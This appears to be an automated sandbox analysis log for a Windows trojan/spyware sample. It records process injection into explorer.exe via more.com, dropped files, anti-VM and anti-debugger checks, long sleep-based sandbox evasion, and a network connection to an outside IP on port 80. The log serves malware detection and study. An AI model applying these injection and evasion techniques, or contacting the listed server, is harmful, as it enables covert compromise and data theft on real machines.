            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0322A870 appears 56 times
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 032061F0 appears 38 times
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 03223340 appears 60 times
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0322A021 appears 60 times
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 03224250 appears 136 times
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
            Source: pTvHtQDXio.exe | Static PE information: invalid certificate
            Source: pTvHtQDXio.exe | Static PE information: Number of sections : 11 > 10
            Source: pTvHtQDXio.exe, 00000000.00000002.1448232703.0000000002B38000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1463469502.000000000548D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1435452182.0000000000C11000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCitizenMP.exe* vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004C76000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezip.exe( vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFilenameCitizenMP.exe* vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/7@0/1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0320E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,10_2_0320E8D0
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Roaming\ancarJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7580
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\20c6f4a26c13cb3c260c246fe6c1910d
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeFile created: C:\Users\user\AppData\Local\Temp\7964f6aeJump to behavior
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: pTvHtQDXio.exeReversingLabs: Detection: 50%
            Source: explorer.exeString found in binary or memory: " /add
            Source: explorer.exeString found in binary or memory: " /add /y
            Source: pTvHtQDXio.exeString found in binary or memory: NATS-SEFI-ADD
            Source: pTvHtQDXio.exeString found in binary or memory: NATS-DANO-ADD
            Source: pTvHtQDXio.exeString found in binary or memory: JIS_C6229-1984-b-add
            Source: pTvHtQDXio.exeString found in binary or memory: jp-ocr-b-add
            Source: pTvHtQDXio.exeString found in binary or memory: JIS_C6229-1984-hand-add
            Source: pTvHtQDXio.exeString found in binary or memory: jp-ocr-hand-add
            Source: pTvHtQDXio.exeString found in binary or memory: ISO_6937-2-add
            Source: pTvHtQDXio.exeString found in binary or memory: /Add: Unexpected [%] object property in an array
            Source: pTvHtQDXio.exeString found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
            Source: pTvHtQDXio.exeString found in binary or memory: application/vnd.groove-help
            Source: pTvHtQDXio.exeString found in binary or memory: "application/x-install-instructions
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeFile read: C:\Users\user\Desktop\pTvHtQDXio.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\pTvHtQDXio.exe "C:\Users\user\Desktop\pTvHtQDXio.exe"
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ancar\comet.exe C:\Users\user\AppData\Roaming\ancar\comet.exe
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: shdocvw.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: pTvHtQDXio.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: pTvHtQDXio.exeStatic file information: File size 14014536 > 1048576
            Source: pTvHtQDXio.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x556000
            Source: pTvHtQDXio.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1fa400
            Source: pTvHtQDXio.exeStatic PE information: More than 200 imports for user32.dll
            Source: pTvHtQDXio.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: pTvHtQDXio.exeStatic PE information: section name: .didata
            Source: nlhiojbr.2.drStatic PE information: section name: hcj
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C917 push ds; retf 6_2_0019C941
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA08 pushfd ; retf 6_2_0019CA09
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB88 push eax; retf 6_2_0019CB89
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019D504 pushad ; ret 6_2_0019D602
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA58 push esp; retf 6_2_0019CA71
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB5C pushfd ; retf 6_2_0019CB5D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C850 push 1C00D749h; retf 6_2_0019C90D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C948 pushfd ; retf 6_2_0019C979
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C948 pushfd ; retf 6_2_0019C9BD
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CBC8 pushfd ; retf 6_2_0019CBC9
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB4C pushfd ; retf 6_2_0019CB4D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA78 push esp; retf 6_2_0019CA71
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C97B pushfd ; retf 6_2_0019C989
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C87C push 1C00D749h; retf 6_2_0019C90D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C9F0 push esp; retf 6_2_0019CA05
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C9E8 push esp; retf 0019h6_2_0019C9E9
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CE6E pushad ; retf 6_2_0019CF13
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A2C1 push ecx; ret 10_2_0322A2D4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322C6F7 push ds; ret 10_2_0322C712
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032175DF pushad ; iretd 10_2_032175E0
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nlhiojbrJump to dropped file
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nlhiojbrJump to dropped file

            Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\more.com; Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NLHIOJBR
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032293ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ancar\comet.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ancar\comet.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\pTvHtQDXio.exe; API/Special instruction interceptor: Address: 759E7C44
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; API/Special instruction interceptor: Address: 759E7945
Source: C:\Windows\SysWOW64\more.com; API/Special instruction interceptor: Address: 759E3B54
Source: C:\Windows\SysWOW64\explorer.exe; API/Special instruction interceptor: Address: C1A317
Source: C:\Windows\SysWOW64\explorer.exe; Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe; Window / User API: threadDelayed 3238
Source: C:\Windows\SysWOW64\explorer.exe; Window / User API: threadDelayed 6612
Source: C:\Windows\SysWOW64\more.com; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlhiojbr
Source: C:\Windows\SysWOW64\explorer.exe TID: 2956; Thread sleep count: 3238 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2956; Thread sleep time: -97140000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3792; Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2956; Thread sleep count: 6612 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2956; Thread sleep time: -198360000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0323F271 FindFirstFileExW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032093D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW
Source: C:\Windows\SysWOW64\explorer.exe; Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\explorer.exe; Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe; Thread delayed: delay time: 30000
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000A.00000002.3893734835.0000000003347000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3893734835.00000000033A5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware, Inc.1
Source: explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware, Inc.0
Source: explorer.exe, 0000000A.00000002.3893734835.00000000033A5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW_
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\ancar\comet.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Code function: 0_2_0076ADA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032362F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322DE60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032407F2 GetProcessHeap
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322A608 SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322EE6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03229BB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\explorer.exe; Network Connect: 62.60.226.15 80
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03208070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; NtProtectVirtualMemory: Direct from: 0x6D6C2D37
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; NtQuerySystemInformation: Direct from: 0x59C2C1
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; NtSetInformationThread: Direct from: 0x76BA46
Source: C:\Windows\SysWOW64\more.com; Memory written: PID: 2972 base: C179C0 value: 55
Source: C:\Windows\SysWOW64\more.com; Memory written: PID: 2972 base: 303A008 value: 00
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
Source: C:\Windows\SysWOW64\more.com; Memory written: C:\Windows\SysWOW64\explorer.exe base: C179C0
Source: C:\Windows\SysWOW64\more.com; Memory written: C:\Windows\SysWOW64\explorer.exe base: 303A008
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322A68F cpuid
